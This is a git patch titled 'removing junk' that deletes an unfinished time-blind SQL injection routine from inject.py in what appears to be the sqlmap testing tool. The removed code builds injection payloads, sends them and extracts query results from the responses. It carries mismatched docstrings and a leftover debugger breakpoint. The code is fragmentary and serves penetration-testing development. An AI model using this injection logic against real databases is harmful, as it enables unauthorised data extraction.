From 537b6191659e301324cb8368ea487c21a4977cfd Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 8 Dec 2010 12:30:25 +0000
Subject: [PATCH] removing junk
---
 lib/request/inject.py | 66 -------------------------------------------
 1 file changed, 66 deletions(-)
diff --git a/lib/request/inject.py b/lib/request/inject.py
index e05db5f52..0f0bdf544 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -336,72 +336,6 @@ def __goError(expression, resumeValue=True):
 return result
-def __goTimeBlind(expression, resumeValue=True):
- """
- Retrieve the output of a SQL query taking advantage of an error-based
- SQL injection vulnerability on the affected parameter.
- """
-
- result = None
-
- if conf.direct:
- return direct(expression), None
-
- condition = (
- kb.resumedQueries and conf.url in kb.resumedQueries.keys()
- and expression in kb.resumedQueries[conf.url].keys()
- )
-
- if condition and resumeValue:
- result = resume(expression, None)
-
- if not result:
- result = timeBlindUse(expression)
- dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
-
- return result
-
-def timeBlindUse(expression):
- """
- Retrieve the output of a SQL query taking advantage of an error SQL
- injection vulnerability on the affected parameter.
- """
-
- output = None
- import pdb
- pdb.set_trace()
- vector = agent.cleanupPayload(kb.injection.data[5].vector)
- query = unescaper.unescape(vector)
- query = agent.prefixQuery(query)
- query = agent.suffixQuery(query)
- check = "%s(?P.*?)%s" % (kb.misc.start, kb.misc.stop)
-
- _, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
- nulledCastedField = agent.nullAndCastField(fieldToCastStr)
-
- if kb.dbms == DBMS.MYSQL:
- nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
-
- expression = expression.replace(fieldToCastStr, nulledCastedField, 1)
- expression = unescaper.unescape(expression)
- expression = safeStringFormat(query, expression)
-
- debugMsg = "query: %s" % expression
- logger.debug(debugMsg)
-
- payload = agent.payload(newValue=expression)
- reqBody, _ = Request.queryPage(payload, content=True)
- output = extractRegexResult(check, reqBody, re.DOTALL | re.IGNORECASE)
-
- if output:
- output = output.replace(kb.misc.space, " ")
-
- if conf.verbose > 0:
- infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
- logger.info(infoMsg)
-
- return output
-
 def __goInband(expression, expected=None, sort=True, resumeValue=True, unpack=True, dump=False):
 """
 Retrieve the output of a SQL query taking advantage of an inband SQL